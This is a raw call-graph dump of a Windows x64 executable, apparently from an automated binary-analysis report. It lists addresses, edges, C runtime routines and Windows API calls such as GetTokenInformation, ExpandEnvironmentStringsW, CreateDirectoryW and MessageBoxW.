16793 7ff644883454 16788->16793 16790 7ff644883a57 16789->16790 16791 7ff6448839e6 16789->16791 16789->16793 16796 7ff644883a5c 16790->16796 16797 7ff644883ab0 16790->16797 16794 7ff6448839ec 16791->16794 16795 7ff644883a81 16791->16795 16792->16793 16793->16751 16798 7ff6448839f1 16794->16798 16799 7ff644883a20 16794->16799 16802 7ff644881d54 38 API calls 16795->16802 16800 7ff644883a91 16796->16800 16801 7ff644883a5e 16796->16801 16803 7ff644883ac7 16797->16803 16806 7ff644883aba 16797->16806 16809 7ff644883abf 16797->16809 16798->16803 16804 7ff6448839f7 16798->16804 16799->16804 16799->16809 16807 7ff644881944 38 API calls 16800->16807 16805 7ff644883a00 16801->16805 16813 7ff644883a6d 16801->16813 16819 7ff644883a1b 16802->16819 16810 7ff6448846ac 45 API calls 16803->16810 16804->16805 16811 7ff644883a32 16804->16811 16804->16819 16808 7ff644884158 47 API calls 16805->16808 16822 7ff644883af0 16805->16822 16806->16795 16806->16809 16807->16819 16808->16819 16812 7ff644882164 38 API calls 16809->16812 16809->16822 16810->16819 16815 7ff644884494 46 API calls 16811->16815 16811->16822 16812->16819 16813->16795 16814 7ff644883a72 16813->16814 16817 7ff644884558 37 API calls 16814->16817 16814->16822 16815->16819 16816 7ff64487c550 _log10_special 8 API calls 16818 7ff644883dea 16816->16818 16817->16819 16818->16751 16820 7ff6448847c0 45 API calls 16819->16820 16819->16822 16823 7ff644883cdc 16819->16823 16820->16823 16821 7ff64488ea08 46 API calls 16821->16823 16822->16816 16823->16821 16823->16822 17104 7ff644880fc8 16824->17104 16828 7ff64488417e 16827->16828 16890 7ff644880b80 16828->16890 16833 7ff6448847c0 45 API calls 16835 7ff6448842c3 16833->16835 16834 7ff6448847c0 45 API calls 16836 7ff644884351 16834->16836 16835->16834 16835->16835 16835->16836 16836->16782 16840 7ff6448844c9 16837->16840 16838 7ff64488450e 16838->16782 16839 7ff6448844e7 16842 7ff64488ea08 46 API calls 16839->16842 16840->16838 16840->16839 16841 7ff6448847c0 45 API calls 16840->16841 16841->16839 16842->16838 16844 7ff644884579 16843->16844 16845 7ff64488a814 _invalid_parameter_noinfo 37 API calls 16844->16845 16846 7ff6448845aa 16844->16846 16845->16846 16846->16782 16848 7ff644881d87 16847->16848 16849 7ff644881db6 16848->16849 16851 7ff644881e73 16848->16851 16853 7ff644881df3 16849->16853 17036 7ff644880c28 16849->17036 16852 7ff64488a814 _invalid_parameter_noinfo 37 API calls 16851->16852 16852->16853 16853->16782 16855 7ff644881977 16854->16855 16856 7ff6448819a6 16855->16856 16858 7ff644881a63 16855->16858 16857 7ff644880c28 12 API calls 16856->16857 16860 7ff6448819e3 16856->16860 16857->16860 16859 7ff64488a814 _invalid_parameter_noinfo 37 API calls 16858->16859 16859->16860 16860->16782 16862 7ff6448846ef 16861->16862 16864 7ff6448846f3 __crtLCMapStringW 16862->16864 17044 7ff644884748 16862->17044 16864->16782 16866 7ff644882197 16865->16866 16867 7ff6448821c6 16866->16867 16869 7ff644882283 16866->16869 16868 7ff644880c28 12 API calls 16867->16868 16871 7ff644882203 16867->16871 16868->16871 16870 7ff64488a814 _invalid_parameter_noinfo 37 API calls 16869->16870 16870->16871 16871->16782 16873 7ff6448847d7 16872->16873 17048 7ff64488d9b8 16873->17048 16879 7ff64488ea39 16878->16879 16888 7ff64488ea47 16878->16888 16880 7ff64488ea67 16879->16880 16881 7ff6448847c0 45 API calls 16879->16881 16879->16888 16882 7ff64488ea9f 16880->16882 16883 7ff64488ea78 16880->16883 16881->16880 16885 7ff64488eac9 16882->16885 16886 7ff64488eb2a 16882->16886 16882->16888 17094 7ff6448900a0 16883->17094 16885->16888 17097 7ff64488f8a0 16885->17097 16887 7ff64488f8a0 _fread_nolock MultiByteToWideChar 16886->16887 16887->16888 16888->16786 16891 7ff644880bb7 16890->16891 16897 7ff644880ba6 16890->16897 16891->16897 16920 7ff64488d5fc 16891->16920 16894 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16896 7ff644880bf8 16894->16896 16895 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 16895->16897 16896->16895 16898 7ff64488e570 16897->16898 16899 7ff64488e5c0 16898->16899 16900 7ff64488e58d 16898->16900 16899->16900 16902 7ff64488e5f2 16899->16902 16901 7ff64488a814 _invalid_parameter_noinfo 37 API calls 16900->16901 16911 7ff6448842a1 16901->16911 16904 7ff64488e705 16902->16904 16915 7ff64488e63a 16902->16915 16903 7ff64488e7f7 16960 7ff64488da5c 16903->16960 16904->16903 16906 7ff64488e7bd 16904->16906 16908 7ff64488e78c 16904->16908 16910 7ff64488e74f 16904->16910 16912 7ff64488e745 16904->16912 16953 7ff64488ddf4 16906->16953 16946 7ff64488e0d4 16908->16946 16936 7ff64488e304 16910->16936 16911->16833 16911->16835 16912->16906 16914 7ff64488e74a 16912->16914 16914->16908 16914->16910 16915->16911 16927 7ff64488a4a4 16915->16927 16918 7ff64488a900 _isindst 17 API calls 16919 7ff64488e854 16918->16919 16921 7ff64488d647 16920->16921 16922 7ff64488d60b _get_daylight 16920->16922 16924 7ff644884f08 _get_daylight 11 API calls 16921->16924 16922->16921 16923 7ff64488d62e HeapAlloc 16922->16923 16926 7ff644893590 _get_daylight 2 API calls 16922->16926 16923->16922 16925 7ff644880be4 16923->16925 16924->16925 16925->16894 16925->16896 16926->16922 16928 7ff64488a4b1 16927->16928 16929 7ff64488a4bb 16927->16929 16928->16929 16934 7ff64488a4d6 16928->16934 16930 7ff644884f08 _get_daylight 11 API calls 16929->16930 16931 7ff64488a4c2 16930->16931 16969 7ff64488a8e0 16931->16969 16933 7ff64488a4ce 16933->16911 16933->16918 16934->16933 16935 7ff644884f08 _get_daylight 11 API calls 16934->16935 16935->16931 16972 7ff6448940ac 16936->16972 16940 7ff64488e3ac 16941 7ff64488e401 16940->16941 16943 7ff64488e3cc 16940->16943 16945 7ff64488e3b0 16940->16945 17025 7ff64488def0 16941->17025 16943->16943 17021 7ff64488e1ac 16943->17021 16945->16911 16947 7ff6448940ac 38 API calls 16946->16947 16948 7ff64488e11e 16947->16948 16949 7ff644893af4 37 API calls 16948->16949 16950 7ff64488e16e 16949->16950 16951 7ff64488e172 16950->16951 16952 7ff64488e1ac 45 API calls 16950->16952 16951->16911 16952->16951 16954 7ff6448940ac 38 API calls 16953->16954 16955 7ff64488de3f 16954->16955 16956 7ff644893af4 37 API calls 16955->16956 16957 7ff64488de97 16956->16957 16958 7ff64488de9b 16957->16958 16959 7ff64488def0 45 API calls 16957->16959 16958->16911 16959->16958 16961 7ff64488daa1 16960->16961 16962 7ff64488dad4 16960->16962 16963 7ff64488a814 _invalid_parameter_noinfo 37 API calls 16961->16963 16964 7ff64488daec 16962->16964 16967 7ff64488db6d 16962->16967 16966 7ff64488dacd __scrt_get_show_window_mode 16963->16966 16965 7ff64488ddf4 46 API calls 16964->16965 16965->16966 16966->16911 16967->16966 16968 7ff6448847c0 45 API calls 16967->16968 16968->16966 16970 7ff64488a778 _invalid_parameter_noinfo 37 API calls 16969->16970 16971 7ff64488a8f9 16970->16971 16971->16933 16973 7ff6448940ff fegetenv 16972->16973 16974 7ff644897e2c 37 API calls 16973->16974 16978 7ff644894152 16974->16978 16975 7ff644894242 16977 7ff644897e2c 37 API calls 16975->16977 16976 7ff64489417f 16980 7ff64488a4a4 __std_exception_copy 37 API calls 16976->16980 16979 7ff64489426c 16977->16979 16978->16975 16981 7ff64489416d 16978->16981 16982 7ff64489421c 16978->16982 16983 7ff644897e2c 37 API calls 16979->16983 16984 7ff6448941fd 16980->16984 16981->16975 16981->16976 16985 7ff64488a4a4 __std_exception_copy 37 API calls 16982->16985 16986 7ff64489427d 16983->16986 16987 7ff644895324 16984->16987 16991 7ff644894205 16984->16991 16985->16984 16989 7ff644898020 20 API calls 16986->16989 16988 7ff64488a900 _isindst 17 API calls 16987->16988 16990 7ff644895339 16988->16990 16999 7ff6448942e6 __scrt_get_show_window_mode 16989->16999 16992 7ff64487c550 _log10_special 8 API calls 16991->16992 16993 7ff64488e351 16992->16993 17017 7ff644893af4 16993->17017 16994 7ff64489468f __scrt_get_show_window_mode 16995 7ff6448949cf 16996 7ff644893c10 37 API calls 16995->16996 17004 7ff6448950e7 16996->17004 16997 7ff644894327 memcpy_s 17003 7ff644894783 memcpy_s __scrt_get_show_window_mode 16997->17003 17012 7ff644894c6b memcpy_s __scrt_get_show_window_mode 16997->17012 16998 7ff64489497b 16998->16995 17000 7ff64489533c memcpy_s 37 API calls 16998->17000 16999->16994 16999->16997 17001 7ff644884f08 _get_daylight 11 API calls 16999->17001 17000->16995 17002 7ff644894760 17001->17002 17005 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 17002->17005 17003->16998 17009 7ff644884f08 11 API calls _get_daylight 17003->17009 17014 7ff64488a8e0 37 API calls _invalid_parameter_noinfo 17003->17014 17006 7ff644895142 17004->17006 17007 7ff64489533c memcpy_s 37 API calls 17004->17007 17005->16997 17008 7ff6448952c8 17006->17008 17015 7ff644893c10 37 API calls 17006->17015 17016 7ff64489533c memcpy_s 37 API calls 17006->17016 17007->17006 17010 7ff644897e2c 37 API calls 17008->17010 17009->17003 17010->16991 17011 7ff644884f08 11 API calls _get_daylight 17011->17012 17012->16995 17012->16998 17012->17011 17013 7ff64488a8e0 37 API calls _invalid_parameter_noinfo 17012->17013 17013->17012 17014->17003 17015->17006 17016->17006 17018 7ff644893b13 17017->17018 17019 7ff64488a814 _invalid_parameter_noinfo 37 API calls 17018->17019 17020 7ff644893b3e memcpy_s 17018->17020 17019->17020 17020->16940 17022 7ff64488e1d8 memcpy_s 17021->17022 17023 7ff6448847c0 45 API calls 17022->17023 17024 7ff64488e292 memcpy_s __scrt_get_show_window_mode 17022->17024 17023->17024 17024->16945 17026 7ff64488df2b 17025->17026 17029 7ff64488df78 memcpy_s 17025->17029 17027 7ff64488a814 _invalid_parameter_noinfo 37 API calls 17026->17027 17028 7ff64488df57 17027->17028 17028->16945 17030 7ff64488dfe3 17029->17030 17032 7ff6448847c0 45 API calls 17029->17032 17031 7ff64488a4a4 __std_exception_copy 37 API calls 17030->17031 17035 7ff64488e025 memcpy_s 17031->17035 17032->17030 17033 7ff64488a900 _isindst 17 API calls 17034 7ff64488e0d0 17033->17034 17035->17033 17037 7ff644880c5f 17036->17037 17043 7ff644880c4e 17036->17043 17038 7ff64488d5fc _fread_nolock 12 API calls 17037->17038 17037->17043 17039 7ff644880c90 17038->17039 17040 7ff644880ca4 17039->17040 17041 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17039->17041 17042 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17040->17042 17041->17040 17042->17043 17043->16853 17045 7ff644884766 17044->17045 17046 7ff64488476e 17044->17046 17047 7ff6448847c0 45 API calls 17045->17047 17046->16864 17047->17046 17049 7ff64488d9d1 17048->17049 17050 7ff6448847ff 17048->17050 17049->17050 17056 7ff644893304 17049->17056 17052 7ff64488da24 17050->17052 17053 7ff64488480f 17052->17053 17054 7ff64488da3d 17052->17054 17053->16786 17054->17053 17091 7ff644892650 17054->17091 17068 7ff64488b150 GetLastError 17056->17068 17059 7ff64489335e 17059->17050 17069 7ff64488b191 FlsSetValue 17068->17069 17070 7ff64488b174 FlsGetValue 17068->17070 17072 7ff64488b1a3 17069->17072 17088 7ff64488b181 17069->17088 17071 7ff64488b18b 17070->17071 17070->17088 17071->17069 17074 7ff64488eb98 _get_daylight 11 API calls 17072->17074 17073 7ff64488b1fd SetLastError 17075 7ff64488b20a 17073->17075 17076 7ff64488b21d 17073->17076 17077 7ff64488b1b2 17074->17077 17075->17059 17090 7ff6448902d8 EnterCriticalSection 17075->17090 17078 7ff64488a504 __CxxCallCatchBlock 38 API calls 17076->17078 17079 7ff64488b1d0 FlsSetValue 17077->17079 17080 7ff64488b1c0 FlsSetValue 17077->17080 17081 7ff64488b222 17078->17081 17083 7ff64488b1ee 17079->17083 17084 7ff64488b1dc FlsSetValue 17079->17084 17082 7ff64488b1c9 17080->17082 17085 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17082->17085 17086 7ff64488aef4 _get_daylight 11 API calls 17083->17086 17084->17082 17085->17088 17087 7ff64488b1f6 17086->17087 17089 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17087->17089 17088->17073 17089->17073 17092 7ff64488b150 __CxxCallCatchBlock 45 API calls 17091->17092 17093 7ff644892659 17092->17093 17100 7ff644896d88 17094->17100 17099 7ff64488f8a9 MultiByteToWideChar 17097->17099 17103 7ff644896dec 17100->17103 17101 7ff64487c550 _log10_special 8 API calls 17102 7ff6448900bd 17101->17102 17102->16888 17103->17101 17105 7ff644880ffd 17104->17105 17106 7ff64488100f 17104->17106 17107 7ff644884f08 _get_daylight 11 API calls 17105->17107 17109 7ff64488101d 17106->17109 17113 7ff644881059 17106->17113 17108 7ff644881002 17107->17108 17110 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 17108->17110 17111 7ff64488a814 _invalid_parameter_noinfo 37 API calls 17109->17111 17116 7ff64488100d 17110->17116 17111->17116 17112 7ff6448813d5 17114 7ff644884f08 _get_daylight 11 API calls 17112->17114 17112->17116 17113->17112 17115 7ff644884f08 _get_daylight 11 API calls 17113->17115 17117 7ff644881669 17114->17117 17118 7ff6448813ca 17115->17118 17116->16751 17119 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 17117->17119 17120 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 17118->17120 17119->17116 17120->17112 17122 7ff644880704 17121->17122 17149 7ff644880464 17122->17149 17124 7ff64488071d 17124->16286 17161 7ff6448803bc 17125->17161 17129 7ff64487c850 17128->17129 17130 7ff644872930 GetCurrentProcessId 17129->17130 17131 7ff644871c80 49 API calls 17130->17131 17132 7ff644872979 17131->17132 17175 7ff644884984 17132->17175 17137 7ff644871c80 49 API calls 17138 7ff6448729ff 17137->17138 17205 7ff644872620 17138->17205 17141 7ff64487c550 _log10_special 8 API calls 17142 7ff644872a31 17141->17142 17142->16325 17144 7ff644880119 17143->17144 17146 7ff644871b89 17143->17146 17145 7ff644884f08 _get_daylight 11 API calls 17144->17145 17147 7ff64488011e 17145->17147 17146->16324 17146->16325 17148 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 17147->17148 17148->17146 17150 7ff6448804ce 17149->17150 17151 7ff64488048e 17149->17151 17150->17151 17153 7ff6448804da 17150->17153 17152 7ff64488a814 _invalid_parameter_noinfo 37 API calls 17151->17152 17154 7ff6448804b5 17152->17154 17160 7ff64488546c EnterCriticalSection 17153->17160 17154->17124 17162 7ff6448803e6 17161->17162 17163 7ff644871a20 17161->17163 17162->17163 17164 7ff6448803f5 __scrt_get_show_window_mode 17162->17164 17165 7ff644880432 17162->17165 17163->16294 17163->16295 17167 7ff644884f08 _get_daylight 11 API calls 17164->17167 17174 7ff64488546c EnterCriticalSection 17165->17174 17169 7ff64488040a 17167->17169 17171 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 17169->17171 17171->17163 17177 7ff6448849de 17175->17177 17176 7ff644884a03 17179 7ff64488a814 _invalid_parameter_noinfo 37 API calls 17176->17179 17177->17176 17178 7ff644884a3f 17177->17178 17214 7ff644882c10 17178->17214 17181 7ff644884a2d 17179->17181 17184 7ff64487c550 _log10_special 8 API calls 17181->17184 17182 7ff644884b1c 17183 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17182->17183 17183->17181 17186 7ff6448729c3 17184->17186 17193 7ff644885160 17186->17193 17187 7ff644884af1 17191 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17187->17191 17188 7ff644884b40 17188->17182 17190 7ff644884b4a 17188->17190 17189 7ff644884ae8 17189->17182 17189->17187 17192 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17190->17192 17191->17181 17192->17181 17194 7ff64488b2c8 _get_daylight 11 API calls 17193->17194 17196 7ff644885177 17194->17196 17195 7ff6448729e5 17195->17137 17196->17195 17197 7ff64488eb98 _get_daylight 11 API calls 17196->17197 17199 7ff6448851b7 17196->17199 17198 7ff6448851ac 17197->17198 17200 7ff64488a948 Concurrency::details::SchedulerProxy::DeleteThis 11 API calls 17198->17200 17199->17195 17352 7ff64488ec20 17199->17352 17200->17199 17203 7ff64488a900 _isindst 17 API calls 17204 7ff6448851fc 17203->17204 17206 7ff64487262f 17205->17206 17207 7ff644879390 2 API calls 17206->17207 17208 7ff644872660 17207->17208 17209 7ff644872683 MessageBoxA 17208->17209 17210 7ff64487266f MessageBoxW 17208->17210 17211 7ff644872690 17209->17211 17210->17211 17212 7ff64487c550 _log10_special 8 API calls 17211->17212 17213 7ff6448726a0 17212->17213 17213->17141 17215 7ff644882c4e 17214->17215 17216 7ff644882c3e 17214->17216 17217 7ff644882c57 17215->17217 17224 7ff644882c85 17215->17224 17220 7ff64488a814 _invalid_parameter_noinfo 37 API calls 17216->17220 17218 7ff64488a814 _invalid_parameter_noinfo 37 API calls 17217->17218 17219 7ff644882c7d 17218->17219 17219->17182 17219->17187 17219->17188 17219->17189 17220->17219 17221 7ff6448847c0 45 API calls 17221->17224 17223 7ff644882f34 17226 7ff64488a814 _invalid_parameter_noinfo 37 API calls 17223->17226 17224->17216 17224->17219 17224->17221 17224->17223 17228 7ff6448835a0 17224->17228 17254 7ff644883268 17224->17254 17284 7ff644882af0 17224->17284 17226->17216 17229 7ff644883655 17228->17229 17230 7ff6448835e2 17228->17230 17233 7ff64488365a 17229->17233 17234 7ff6448836af 17229->17234 17231 7ff6448835e8 17230->17231 17232 7ff64488367f 17230->17232 17240 7ff6448835ed 17231->17240 17243 7ff6448836be 17231->17243 17301 7ff644881b50 17232->17301 17235 7ff64488365c 17233->17235 17236 7ff64488368f 17233->17236 17234->17232 17234->17243 17252 7ff644883618 17234->17252 17237 7ff6448835fd 17235->17237 17242 7ff64488366b 17235->17242 17308 7ff644881740 17236->17308 17253 7ff6448836ed 17237->17253 17287 7ff644883f04 17237->17287 17240->17237 17244 7ff644883630 17240->17244 17240->17252 17242->17232 17246 7ff644883670 17242->17246 17243->17253 17315 7ff644881f60 17243->17315 17244->17253 17297 7ff6448843c0 17244->17297 17249 7ff644884558 37 API calls 17246->17249 17246->17253 17248 7ff64487c550 _log10_special 8 API calls 17250 7ff644883983 17248->17250 17249->17252 17250->17224 17252->17253 17322 7ff64488e858 17252->17322 17253->17248 17255 7ff644883289 17254->17255 17256 7ff644883273 17254->17256 17259 7ff64488a814 _invalid_parameter_noinfo 37 API calls 17255->17259 17260 7ff6448832c7 17255->17260 17257 7ff644883655 17256->17257 17258 7ff6448835e2 17256->17258 17256->17260 17263 7ff64488365a 17257->17263 17264 7ff6448836af 17257->17264 17261 7ff6448835e8 17258->17261 17262 7ff64488367f 17258->17262 17259->17260 17260->17224 17271 7ff6448835ed 17261->17271 17274 7ff6448836be 17261->17274 17268 7ff644881b50 38 API calls 17262->17268 17265 7ff64488365c 17263->17265 17266 7ff64488368f 17263->17266 17264->17262 17264->17274 17281 7ff644883618 17264->17281 17267 7ff6448835fd 17265->17267 17272 7ff64488366b 17265->17272 17269 7ff644881740 38 API calls 17266->17269 17270 7ff644883f04 47 API calls 17267->17270 17282 7ff6448836ed 17267->17282 17268->17281 17269->17281 17270->17281 17271->17267 17273 7ff644883630 17271->17273 17271->17281 17272->17262 17276 7ff644883670 17272->17276 17277 7ff6448843c0 47 API calls 17273->17277 17273->17282 17275 7ff644881f60 38 API calls 17274->17275 17274->17282 17275->17281 17279 7ff644884558 37 API calls 17276->17279 17276->17282 17277->17281 17278 7ff64487c550 _log10_special 8 API calls 17280 7ff644883983 17278->17280 17279->17281 17280->17224 17281->17282 17283 7ff64488e858 47 API calls 17281->17283 17282->17278 17283->17281 17335 7ff644880d14 17284->17335 17288 7ff644883f26 17287->17288 17289 7ff644880b80 12 API calls 17288->17289 17290 7ff644883f6e 17289->17290 17291 7ff64488e570 46 API calls 17290->17291 17292 7ff644884041 17291->17292 17293 7ff6448847c0 45 API calls 17292->17293 17296 7ff644884063 17292->17296 17293->17296 17294 7ff6448847c0 45 API calls 17295 7ff6448840ec 17294->17295 17295->17252 17296->17294 17296->17295 17296->17296 17298 7ff6448843d8 17297->17298 17300 7ff644884440 17297->17300 17299 7ff64488e858 47 API calls 17298->17299 17298->17300 17299->17300 17300->17252 17302 7ff644881b83 17301->17302 17303 7ff644881bb2 17302->17303 17305 7ff644881c6f 17302->17305 17304 7ff644880b80 12 API calls 17303->17304 17307 7ff644881bef 17303->17307 17304->17307 17306 7ff64488a814 _invalid_parameter_noinfo 37 API calls 17305->17306 17306->17307 17307->17252 17309 7ff644881773 17308->17309 17310 7ff6448817a2 17309->17310 17312 7ff64488185f 17309->17312 17311 7ff644880b80 12 API calls 17310->17311 17314 7ff6448817df 17310->17314 17311->17314 17313 7ff64488a814 _invalid_parameter_noinfo 37 API calls 17312->17313 17313->17314 17314->17252 17316 7ff644881f93 17315->17316 17317 7ff644881fc2 17316->17317 17319 7ff64488207f 17316->17319 17318 7ff644880b80 12 API calls 17317->17318 17321 7ff644881fff 17317->17321 17318->17321 17320 7ff64488a814 _invalid_parameter_noinfo 37 API calls 17319->17320 17320->17321 17321->17252 17323 7ff64488e880 17322->17323 17324 7ff64488e8c5 17323->17324 17325 7ff6448847c0 45 API calls 17323->17325 17330 7ff64488e885 __scrt_get_show_window_mode 17323->17330 17331 7ff64488e8ae __scrt_get_show_window_mode 17323->17331 17324->17330 17324->17331 17332 7ff6448907e8 17324->17332 17325->17324 17326 7ff64488a814 _invalid_parameter_noinfo 37 API calls 17326->17330 17330->17252 17331->17326 17331->17330 17334 7ff64489080c WideCharToMultiByte 17332->17334 17336 7ff644880d53 17335->17336 17337 7ff644880d41 17335->17337 17339 7ff644880d9d 17336->17339 17340 7ff644880d60 17336->17340 17338 7ff644884f08 _get_daylight 11 API calls 17337->17338 17341 7ff644880d46 17338->17341 17344 7ff644880e46 17339->17344 17345 7ff644884f08 _get_daylight 11 API calls 17339->17345 17342 7ff64488a814 _invalid_parameter_noinfo 37 API calls 17340->17342 17343 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 17341->17343 17347 7ff644880d51 17342->17347 17343->17347 17346 7ff644884f08 _get_daylight 11 API calls 17344->17346 17344->17347 17348 7ff644880e3b 17345->17348 17349 7ff644880ef0 17346->17349 17347->17224 17350 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 17348->17350 17351 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 17349->17351 17350->17344 17351->17347 17355 7ff64488ec3d 17352->17355 17353 7ff64488ec42 17354 7ff644884f08 _get_daylight 11 API calls 17353->17354 17358 7ff6448851dd 17353->17358 17360 7ff64488ec4c 17354->17360 17355->17353 17357 7ff64488ec8c 17355->17357 17355->17358 17356 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 17356->17358 17357->17358 17359 7ff644884f08 _get_daylight 11 API calls 17357->17359 17358->17195 17358->17203 17359->17360 17360->17356 17362 7ff6448785b1 GetTokenInformation 17361->17362 17363 7ff644878633 __vcrt_freefls 17361->17363 17364 7ff6448785dd 17362->17364 17365 7ff6448785d2 GetLastError 17362->17365 17366 7ff64487864c 17363->17366 17367 7ff644878646 CloseHandle 17363->17367 17364->17363 17368 7ff6448785f9 GetTokenInformation 17364->17368 17365->17363 17365->17364 17366->16343 17367->17366 17368->17363 17369 7ff64487861c 17368->17369 17369->17363 17370 7ff644878626 ConvertSidToStringSidW 17369->17370 17370->17363 17372 7ff64487c850 17371->17372 17373 7ff644872b74 GetCurrentProcessId 17372->17373 17374 7ff6448726b0 48 API calls 17373->17374 17375 7ff644872bc7 17374->17375 17376 7ff644884bd8 48 API calls 17375->17376 17377 7ff644872c10 MessageBoxW 17376->17377 17378 7ff64487c550 _log10_special 8 API calls 17377->17378 17379 7ff644872c40 17378->17379 17379->16353 17381 7ff6448725e5 17380->17381 17382 7ff644884bd8 48 API calls 17381->17382 17383 7ff644872604 17382->17383 17383->16368 17429 7ff644888794 17384->17429 17388 7ff6448781dc 17387->17388 17389 7ff644879390 2 API calls 17388->17389 17390 7ff6448781fb 17389->17390 17391 7ff644878216 ExpandEnvironmentStringsW 17390->17391 17392 7ff644878203 17390->17392 17393 7ff64487823c __vcrt_freefls 17391->17393 17394 7ff644872810 49 API calls 17392->17394 17395 7ff644878253 17393->17395 17396 7ff644878240 17393->17396 17418 7ff64487820f __vcrt_freefls 17394->17418 17400 7ff644878261 GetDriveTypeW 17395->17400 17401 7ff6448782bf 17395->17401 17397 7ff644872810 49 API calls 17396->17397 17397->17418 17398 7ff64487c550 _log10_special 8 API calls 17399 7ff6448783af 17398->17399 17399->16367 17419 7ff644888238 17399->17419 17405 7ff644878295 17400->17405 17406 7ff6448782b0 17400->17406 17567 7ff644887e08 17401->17567 17404 7ff6448782d1 17408 7ff6448782d9 17404->17408 17411 7ff6448782ec 17404->17411 17409 7ff644872810 49 API calls 17405->17409 17560 7ff64488796c 17406->17560 17410 7ff644872810 49 API calls 17408->17410 17409->17418 17410->17418 17412 7ff64487834e CreateDirectoryW 17411->17412 17414 7ff6448726b0 48 API calls 17411->17414 17413 7ff64487835d GetLastError 17412->17413 17412->17418 17413->17418 17416 7ff644878328 CreateDirectoryW 17414->17416 17416->17411 17418->17398 17420 7ff644888245 17419->17420 17421 7ff644888258 17419->17421 17422 7ff644884f08 _get_daylight 11 API calls 17420->17422 17668 7ff644887ebc 17421->17668 17425 7ff64488824a 17422->17425 17427 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 17425->17427 17426 7ff644888256 17426->16371 17427->17426 17470 7ff644891558 17429->17470 17529 7ff6448912d0 17470->17529 17550 7ff6448902d8 EnterCriticalSection 17529->17550 17561 7ff6448879bd 17560->17561 17562 7ff64488798a 17560->17562 17561->17418 17562->17561 17579 7ff644890474 17562->17579 17565 7ff64488a900 _isindst 17 API calls 17566 7ff6448879ed 17565->17566 17568 7ff644887e24 17567->17568 17569 7ff644887e92 17567->17569 17568->17569 17571 7ff644887e29 17568->17571 17613 7ff6448907c0 17569->17613 17572 7ff644887e41 17571->17572 17573 7ff644887e5e 17571->17573 17588 7ff644887bd8 GetFullPathNameW 17572->17588 17596 7ff644887c4c GetFullPathNameW 17573->17596 17578 7ff644887e56 __vcrt_freefls 17578->17404 17580 7ff64489048b 17579->17580 17581 7ff644890481 17579->17581 17582 7ff644884f08 _get_daylight 11 API calls 17580->17582 17581->17580 17585 7ff6448904a7 17581->17585 17587 7ff644890493 17582->17587 17583 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 17584 7ff6448879b9 17583->17584 17584->17561 17584->17565 17585->17584 17586 7ff644884f08 _get_daylight 11 API calls 17585->17586 17586->17587 17587->17583 17589 7ff644887c14 17588->17589 17590 7ff644887bfe GetLastError 17588->17590 17592 7ff644887c10 17589->17592 17594 7ff644884f08 _get_daylight 11 API calls 17589->17594 17591 7ff644884e7c _fread_nolock 11 API calls 17590->17591 17593 7ff644887c0b 17591->17593 17592->17578 17595 7ff644884f08 _get_daylight 11 API calls 17593->17595 17594->17592 17595->17592 17597 7ff644887c7f GetLastError 17596->17597 17601 7ff644887c95 __vcrt_freefls 17596->17601 17598 7ff644884e7c _fread_nolock 11 API calls 17597->17598 17599 7ff644887c8c 17598->17599 17600 7ff644884f08 _get_daylight 11 API calls 17599->17600 17602 7ff644887c91 17600->17602 17601->17602 17603 7ff644887cef GetFullPathNameW 17601->17603 17604 7ff644887d24 17602->17604 17603->17597 17603->17602 17608 7ff644887d98 memcpy_s 17604->17608 17609 7ff644887d4d __scrt_get_show_window_mode 17604->17609 17605 7ff644887d81 17606 7ff644884f08 _get_daylight 11 API calls 17605->17606 17607 7ff644887d86 17606->17607 17608->17578 17609->17605 17609->17608 17610 7ff644887dba 17609->17610 17610->17608 17612 7ff644884f08 _get_daylight 11 API calls 17610->17612 17612->17607 17616 7ff6448905d0 17613->17616 17617 7ff644890612 17616->17617 17618 7ff6448905fb 17616->17618 17620 7ff644890616 17617->17620 17621 7ff644890637 17617->17621 17619 7ff644884f08 _get_daylight 11 API calls 17618->17619 17623 7ff644890600 17619->17623 17642 7ff64489073c 17620->17642 17654 7ff64488f5b8 17621->17654 17628 7ff64488a8e0 _invalid_parameter_noinfo 37 API calls 17623->17628 17626 7ff64489063c 17627 7ff64489061f 17641 7ff64489060b __vcrt_freefls 17628->17641 17632 7ff64487c550 _log10_special 8 API calls 17636 7ff644890731 17632->17636 17636->17578 17641->17632 17643 7ff644890786 17642->17643 17644 7ff644890756 17642->17644 17646 7ff644890791 GetDriveTypeW 17643->17646 17648 7ff644890771 17643->17648 17645 7ff644884ee8 _fread_nolock 11 API calls 17644->17645 17647 7ff64489075b 17645->17647 17646->17648 17649 7ff644884f08 _get_daylight 11 API calls 17647->17649 17650 7ff64487c550 _log10_special 8 API calls 17648->17650 17651 7ff644890766 17649->17651 17652 7ff64489061b 17650->17652 17652->17626 17652->17627 17655 7ff64489a4d0 __scrt_get_show_window_mode 17654->17655 17656 7ff64488f5ee GetCurrentDirectoryW 17655->17656 17657 7ff64488f62c 17656->17657 17661 7ff64488f605 17656->17661 17658 7ff64488eb98 _get_daylight 11 API calls 17657->17658 17659 7ff64488f63b 17658->17659 17660 7ff64487c550 _log10_special 8 API calls 17664 7ff64488f699 17660->17664 17661->17660 17664->17626 17675 7ff6448902d8 EnterCriticalSection 17668->17675 17677 7ff64487456a 17676->17677 17678 7ff644879390 2 API calls 17677->17678 17679 7ff64487458f 17678->17679 17680 7ff64487c550 _log10_special 8 API calls 17679->17680 17681 